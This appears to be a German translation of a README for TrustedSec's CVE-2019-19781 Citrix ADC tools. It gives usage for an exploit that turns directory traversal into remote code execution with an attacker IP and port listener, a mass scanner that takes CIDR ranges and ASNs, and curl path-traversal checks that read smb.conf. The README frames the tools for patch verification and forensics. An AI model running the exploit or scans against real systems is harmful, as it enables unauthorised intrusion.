
Dieses Tool wird für die Citrix-ADC- (NetScaler-) Schwachstelle veröffentlicht. Wir veröffentlichen dies nur, weil andere den Exploit-Code zuerst veröffentlicht haben.
Dies wurde nur hochgeladen, weil andere Forscher ihren Code zuerst veröffentlicht haben. Wir hätten gehofft, dies noch etwas länger geheim zu halten, während die Verteidiger ausreichend Zeit hatten, ihre Systeme zu patchen.
Wir sind ganz für verantwortungsvolle Offenlegung, in diesem Fall - die Katze war bereits aus dem Sack.
Exploits: CVE-2019-19781
root@stronghold-nix:/home/relik/Desktop/git/cve-2019-19781# python citrixmash.py
Citrixmash v0.1 - nutzt den Citrix Directory Traversal Bug aus: CVE-2019-19781 Tool geschrieben von: Rob Simon und Dave Kennedy Beiträge: Das TrustedSec-Team Webseite: https://www.trustedsec.com INFO: https://www.trustedsec.com/blog/critical-exposure-in-citrix-adc-netscaler-unauthenticated-remote-code-execution/ Forensik und IOCs: https://www.trustedsec.com/blog/netscaler-remote-code-execution-forensics/
Dieses Tool nutzt einen Directory-Traversal-Fehler in Citrix ADC (NetScaler) aus, der ein Perl-Skript aufruft, das verwendet wird, um Dateien im XML-Format an das Zielsystem anzuhängen. Dies ermöglicht wiederum Remote-Codeausführung.
Achten Sie darauf, diese beiden Dateipfade zu bereinigen: /var/tmp/netscaler/portal/templates/ /netscaler/portal/templates/
Beachten Sie, dass DNS-Hostnamen und IP-Adressen in den Feldern victimaddress und attackerip_listener unterstützt werden.
Verwendung:
python citrixmash.py <attackerip_listener> <attacker_port>
usage: citrixmash.py [-h] target targetport attackerip attackerport
Dies ist ein einfacher Test, um zu prüfen, ob der Server weiterhin anfällig für CVE-2019-19781 ist.
Verwendung: python3 cve-2019-19781.py
Beachten Sie, dass Sie auch CIDR-Notationen wie 192.168.1.1/24 sowie Hostnamen verwenden können.
Es zeigt an, ob der Server noch verwundbar ist oder nicht. Sie können jeweils nur einen Server überprüfen.
CVE-2019-19781-Scanner Unternehmen: TrustedSec Geschrieben von: Dave Kennedy Dies prüft, ob das entfernte System weiterhin anfällig für CVE-2019-19781 ist. Dies wird jeweils nur einen einzelnen Host scannen. Sie können auch CIDR-Notationen verwenden, zum Beispiel: 192.168.1.1/24 Sie können anstelle von IP-Adressen auch Hostnamen verwenden. Sie können außerdem eine Datei mit IP-Adressen verwenden, die von einem externen Tool erstellt wurde.
Beispiel: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 Beispiel2: python3 cve-2019-19781_scanner.py 192.168.1.1 443 Beispiel3: python3 cve-2019-19781_scanner.py fakewebsiteaddress.com 443 Beispiel4: python3 cve-2019-19781_scanner.py as15169 443 Beispiel5: python3 cve-2019-19781_scanner.py 192.168.1.1/24 443 verbose Beispiel6: python3 cve-2019-19781_scanner.py file:hostfile 443
Verwendung: python3 cve-2019-19781_scanner.py targetip targetport
usage: cve-2019-19781_scanner.py [-h] target targetport [verbose]
Wenn Sie testen möchten, ob diese Sicherheitslücke entschärft wurde, verwenden Sie Folgendes:
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is
Oder wenn Sie eine nicht öffentliche oder interne Unternehmens-Zertifizierungsstelle (CA) verwenden, können Sie die Prüfung mit der Option --insecure überschreiben.
curl https://host/vpn/../vpns/cfg/smb.conf --path-as-is --insecure
Ein 403-Statuscode bedeutet, dass Sie gepatcht sind, oder es wird eine Citrix-Website und NICHT die smb.conf-Datei selbst zurückgegeben.
Wenn Sie die smb.conf sehen können, sind Sie verwundbar.
Um die Anforderungen zu installieren, müssen Sie den folgenden Befehl ausführen.
pip3 install -r requirements.txt